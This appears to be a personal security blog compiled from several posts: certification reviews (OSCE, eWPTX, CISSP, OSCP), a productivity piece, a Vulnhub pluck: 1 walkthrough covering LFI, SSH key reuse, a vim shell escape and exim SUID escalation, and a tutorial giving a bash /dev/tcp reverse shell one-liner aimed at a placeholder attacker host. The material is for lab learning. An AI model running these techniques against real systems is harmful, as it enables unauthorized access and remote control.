OSCE Review

Hi There,

Ever since passing the OSCP exam I was thinking of taking the CTP course However, it was not a priority at that time since I have to focus on web stuffs. But In the last few months I had a free time to do.

as usual to register the course you have to solve the challenge at http://www.fc4.me/ I was able to solve the first part easily however the second part was a reality check for me, since I did not read/write *value* for years and I don’t do reverse stuffs on daily basis.

I went a head and start preparing for the course following tulpa guide https://tulpa-security.com/2017/07/18/288/ which was excellent. at the same time I did practice VulnServer extensively, it’s really a good piece of code to practice and understand different scenarios.

after 2 months of preparing and practicing I felt ready and register for the course. the course contents is small but specific and expect the student to be familiar with the terms used in the course materials. I did finish reading the materials quickly and start solving the lab boxes. the course is outdated really however the concepts represented is fundamental and you can apply it to modern systems with a little different.

I booked for the exam after finishing the 1 month lab time. I can’t say a much about the exam except that you are expected to research during the exam and try different tricks to get the results. the 48 hours is enough to solve the exam if you manage the time properly and understand the exam objectives clearly.

In the end I did enjoy doing the course although I don’t do reverse engineering daily. but the course do fill a big space in understanding how certain and important types of attacks do happen.

eWPTX Review

Hello There,

In this post I will talk about my experience with eWPTX certificate.

I did register for this course since I was looking for advanced training in Web Hacking, eWPTX was the best option out there after reading the syllabus.

Registration went smoothly, there is no waiting queue like OSCP. pay and start the course instantly!


The materials is very good and cover many topics in details. however I found it annoying that many slides contains a few line of sentences, This can be rearrange to be presented in better way. But I like the option to read the materials in many forms like PDF,HTML5 or Flash.

The materials covers XSS, CSRF, SQLi and XML attacks But what makes this course interesting is the use of evasion and obfuscation techniques to carry on a successful attacks. That’s why its important to study and focus in the first portion of the materials that talks about the different encoding used in the web.


The lab was great! well maintained with many nice feature. the lab is isolated so each student has his own scenario to test and practice. Course topics is divided in separate labs with many small tasks to be tested. Also there is a solutions provided for each labs in case student need it.


the student can start the exam at any time. I decided to start mine after 3 months of reading the materials and practicing in labs.

The exam is quite nice, You are tasked to do a black box approach for a small web app. There is no specific tasks assigned, You have to find as many vulnerabilities as you can in one week time frame.

It was a great/ frustrating experience ūüôā I kept coming to the web app every day and question everything until the last day. after that you have one week to write the report and submit it, I did write/review in 2 days.

After 3 weeks I received the pass email.


The eWPTX is a great course, I did learn many new topics like 2nd Order SQLi and make the best of Tools like SQLMap.

However I think eLs should maintain the course, many typos exists since 2014 and some of the provided solutions for labs does not work and need to be checked.

But this will not effect the course and anyone interested in advanced web hacking will find this course great.






CISSP Review

Hello There,

In this post I will talk about my experience with CISSP Certificate. Why I study it and how I manage to get certified.


After finishing OSCP certificate I start studying CISSP the next day, it was in my plan to study CISSP right after finishing OSCP. I felt that I need to read/study about information security from managerial level with bird’s-eye view. Many people look down on CISSP and think its useless, However I can assure you that the materials in CISSP is really good and can be beneficial for anyone want to know more about information security from managing position.¬†

Study Plan:

for studying the materials I focused on books only, I hate videos and though its unnecessary since the course is theoretical and no hands-on is required.

below is the list of books I used:

In total I spent 4 months reading and studying the materials, this is what I did during this period:

  • I was not in a hurry so I spent 2.5 months reading the official study guide, it’s a 1000 page and by that I was reading for 1-2 hours during the workdays and rest at weekends.
  • after finishing the official guide I start reading the 11th hour book and finish it in one week to recap what I did learn in the official guide.
  • next I start solving the practice test kits but only the questions focused on domains, there is 8 chapters having 100 questions associated with each domains.
  • after knowing my weak points I start reading CISSP Study guide by Eric conrad. it’s a fantastic guide ! I wish I started with it in the beginning, However I did read it fast since I was already done with the official guide. But Also I was taking notes for hard things since Mr.Conrad way of illustrating things is great.
  • back again to solve the rest of the practice test kits which is 2 full 250 questions exams to test my progress. still need to study and improve in some weak areas, and in this step I was solving each question and correct my answer at the same time.
  • before the exam I start skimming through the official guide, at the end of each chapters there is a good summary to read. Also I was skimming through the practice test kits questions specially the red flag ones.
  • before entering the exam room I did read for the last time my personal notes and skim through the 11th hour book to memorize the hard stuffs.


I can’t say much about the exam ( NDA ) but the questions is not the same in practice test kits, it’s scenario based and need to think about the best answer that fits the mentioned case.

I did consume the whole 6 hours exam time as I did evaluate and double check every question, did not take any breaks.


After passing the exam you need some CISSP fella to endorse your application, I do not know anyone so I did choose ISC2. Submitted my papers and exactly after 4 weeks I got the congratulations letter.


I recommend CISSP for anyone interested in information security, I do agree that it’s not a technical training and with respectable experience in the field you do not need a certificate to approve you. But the materials do serve as a great refresh for anyone working in the field or someone want to start in managing position.


Getting things done. The Cook Model

All of us have projects to be finished and many people do not continue their projects for different reasons. In this post I will talk about a routine usually I do follow to help me finishing my projects, I hope you find it useful.

I call this routine The Cook Model. this routine is simple yet effective, Just like any meal you want to prepare, you have to follow 3 phases in sequence to have an enjoyable meal.

1. Prepare:

This is the initial phase and the most important one I think. In this phase you are hungry and start preparing for the meal by buying the grocery, Reading preparing instructions and so on.

So does in projects, you got to have the reason why you want to start this project, why it’s important for you and what is the expected result.
Your strategy must be clear and defined, Please be honest with yourself and take in consideration all the hurdles you may face and what power or tools can help you.
Take as much time as you want in this phase to do your research, setting plan, buying tools/books, talking to people, looking for alternatives and so on.
By finishing this phase you will have an agenda to follow with specific tasks and time frame.

2. Cook:

Cook your meal! Follow your agenda in phase 1 step by step. You can’t change your mind now in the middle of the cook by taking out the chicken of the grill and try to Fry it! You will ruin the whole meal.

This is the action time, you have to follow your agenda step by step and believe in the work you have done in phase 1.
You have to be patient and be persuasive, it’s a one way route and you can’t rethink about the plan or try to take a detour. This is where most people fail because they keep questioning their goal/plan and try to start all over again, and by that they start juggling around in hope to find a better settlement.
I can sum this phase in one word: “commitment”.


Now that you have done your job it’s time to taste the meal, is it salty? Need more time? Or just delicious ?

In this phase it’s not important if you success or fail, be proud of the effort you have done because you did reach the final destination. Some people do stuck in the previous phases and can’t reach this final phase so it will be an unfinished project for them and they can’t enjoy the result or evaluate the fail.
If you success then be happy and enjoy your achievement. If not then there is lessons to be learned from this experience and you can start all over again by modifying phase 1 and continue your project.


You only need one person approval and this person is you. Take responsibility of your project and quit caring about other people opinions/experiences.
Most people do fail because they get stuck in infinite loop between phase 1 and 2 due to different reasons ( people opinions / self doubt / circumstances / etc ).
This is a one way route and you have to keep moving forward, don’t hesitate or settle for less.

pluck: 1 walk-through

In this post we will walk-through the pluck: 1 VM So let’s start !


We will scan all TCP ports along with top UDP ports

root@kali:~/vulnhub/pluck# nmap -sS -p- -A --reason  \
> && nmap -sU -sV -A --top-ports 100 \
> && nmap -sU -p 161 \
> && nmap -sU -p 69 

Starting Nmap 7.40 ( https://nmap.org ) at 2017-04-24 11:32 +03
Nmap scan report for
Host is up, received arp-response (0.0010s latency).
Not shown: 65531 closed ports
Reason: 65531 resets
22/tcp   open  ssh     syn-ack ttl 64 OpenSSH 7.3p1 Ubuntu 1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 e8:87:ba:3e:d7:43:23:bf:4a:6b:9d:ae:63:14:ea:71 (RSA)
|_  256 8f:8c:ac:8d:e8:cc:f9:0e:89:f7:5d:a0:6c:28:56:fd (ECDSA)
80/tcp   open  http    syn-ack ttl 64 Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Pluck
3306/tcp open  mysql   syn-ack ttl 64 MySQL (unauthorized)
5355/tcp open  llmnr?  syn-ack ttl 1
MAC Address: 00:0C:29:1E:99:39 (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.6
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

1   1.05 ms

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 125.03 seconds

Starting Nmap 7.40 ( https://nmap.org ) at 2017-04-24 11:34 +03
Nmap scan report for
Host is up (0.00061s latency).
Not shown: 98 closed ports
68/udp open|filtered dhcpc
69/udp open|filtered tftp
MAC Address: 00:0C:29:1E:99:39 (VMware)
Too many fingerprints match this host to give specific OS details
Network Distance: 1 hop

1   0.61 ms

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 204.24 seconds

Starting Nmap 7.40 ( https://nmap.org ) at 2017-04-24 11:37 +03
Nmap scan report for
Host is up (0.00074s latency).
161/udp closed snmp
MAC Address: 00:0C:29:1E:99:39 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 1.54 seconds

Starting Nmap 7.40 ( https://nmap.org ) at 2017-04-24 11:37 +03
Nmap scan report for
Host is up (0.00056s latency).
69/udp open|filtered tftp
MAC Address: 00:0C:29:1E:99:39 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 1.11 seconds

The website on port 80 is powered by PHP, I did try many PHP tricks to check for vulnerabilities and discovered that the site is prone to LFI and PHP base64-encode trick !

now we have a list of users:

  • bob
  • peter
  • paul
  • backup-user


I did try to brute-force , SQLi the admin login page but no luck.

Next I went back to the users list and tried to include the backup script mentioned in login shell of backup-user

We can try to include the tar file but this will be a total mess ! so let’s make a use of PHP base64-encode trick to download the file safely by encoding the data of backup.tar file then cut the HTML around it and decode it locally.

curl | grep 'jumbotron>' | cut -d '>' -f 2 | cut -d '<' -f 1 > backup.tar64
base64 -d backup.tar64 > backup.tar
mkdir backup ; tar -xvf backup.tar -C backup

After extracting the file We notice the existence of keys folder containing SSH keys of the user Paul, We will test the keys until we get a valid SSH login

ssh paul@ -i id_key4

We are presented with shell login of menu type in this case Pdmenu, However We can escape this menu by selecting Edit file and type any file name to start using the vim.

:set shell=/bin/bash

Then type the following to jump on Bash


Privilege Escalation

I did try to escalate using Kernel exploits but no luck, However after searching for SUIDs We can notice the existence of exim agent.

paul@pluck:~$ find / -perm -u=s -type f 2>/dev/null

I did try some exploits to escalate the privilege using exim agent but did not work for me, However I decided to give this exploit a shot since the difference in version is minimal and luckily this exploit works.









and that’s it.


OSCP Review


I have been developing Software for years, However had a great chance to switch my career path to be in security field recently and that’s why I started looking for trainings to gain more skills.
Security for a software developer is writing a good code, running scanners, setting firewall, etc.
but there is still a missing link, how can hackers break into servers, what tools and techniques they use?

Enter OffSec:

In my journey for finding the right trainings, I reached OffSec since I was using Kali Linux as a platform to use scanners.
I was skeptical at first but after reading different reviews I decided to enroll in PWK course since I am a big fan of Linux and I need a training with a hands-on experience to know how hacking happens.


Fast forward after registration, I received the e-mail package and start reading…
Well I have to say, this is indeed a 101 course but the topics covered is broad and wide.
OffSec will takes you in a journey to all hacking topics, you will know the How and the Why for each concept in a self-learning way.
as Morpheus said: “I’m trying to free your mind, Neo. But I can only show you the door. You’re the one that has to walk through it.”
I did spend two months reading the materials without rushing to know all the topics and connect the dots before hitting the lab, In the same time I did solve the exercises and skipped the ones required more engaging to do it later on.


After finishing materials reading and taking summer vacation for one month, I was ready to hit the lab.
I have to say the Lab is just fantastic! I was overwhelmed and running around like a lost sheep in the first few days, but after that I start enumerating the whole lab network and start hacking the low-hanging fruit boxes first.
I spent approximately 3.5 months hacking the lab machines and was able to hack fantastic boxes like PAIN, Sufferance and gh0st. But personally I like dotty.


after hitting 32 boxes, I felt ready to take the exam to test my skills.
my first attempt went bad and failed, the exam is BRUTAL but was an eye-opener and knew my weakness.
I did take multiple exam attempts and with each attempt I was gaining more and more skills, it’s a tough process but the aftermath of it is HUGE and learned/tuned a lot of things.
If you want to take the exam then you have to be 100% ready for it. 80% or 90% will not be enough, you have to Try Harder and Harder.
On Saturday 25-3-2017 I passed the OSCP exam with a BIG smile, it went smoothly and I was able to finish the exam along with writing the report in the 24 hours time slot.


  • you have to change your mindset, in this course you have to think like a hacker or a breaker because developers expect the code to work in a certain way but the hacker will try to twist the code to get in.
  • study and research, you have to read a lot of information and test it to understand what is happening and why.
  • its simple, sometimes it’s plain simple to hack in and you do not have to go deep in the rabbit hole.
  • set a game-plan, know you target very will and spend time reading the enumeration data to set a proper game plan before start hacking Otherwise you will waste your resources.
  • practice, download images from Vulnhub.com and practice. Also I do find the walk-throughs a great way to learn from other people experience.

Final Toughs:

I do encourage anyone seriously interested in Information Security or Hacking to enroll in PWK course, the learning curve is high and you will learn a lot of things in a short amount of time.
you have to dedicate effort/time for this course, otherwise you can’t learn or pass the exam.
the community and OffSec people are great and you will learn many new things, Definitely I will enroll in other courses and try to engage more in the community.


the below links did help me much when I was studying the course









Bash Reverse Shell

In this post I will talk about a special type of reverse shell, I like this type of shell because mostly you can use tools already exist on your target.

But before start talking about Bash Reverse Shell in details, I would like to mention some limitations about this type of shell:

  • You can’t use this type of shell against Windows targets since bash is not there.
  • You can’t use this type of shell if the Unix-Like target do not have the Bash package installed. However you can use the ancient Bourne shell (sh).

Now All you have to do is to setup a nc listener on your attacking machine.

nc -nlvp PORT

Then Issue this command on your target.

/bin/bash -i >& /dev/tcp/ATTACKER-IP/ATTACKER-PORT 0>&1

where :

  • ATTACKER-IP is your attacking machine IP address
  • ATTACKER-IP is port used by nc listener

And that’s ! you should have a bash reverse shell by now, This reverse shell was created thanks to Bash capabilities and Unix-Like File descriptor handler.

You can replace /bin/bash by /bin/sh if the target machine lack bash package.

Final Thoughts:

As always you have to enumerate your target to know the environment in front of you. In our case you have to check for Bash or Sh existence and located where.

this post serve as a short note on how to create a Bash reverse shell, please read more about the software or technology used in references.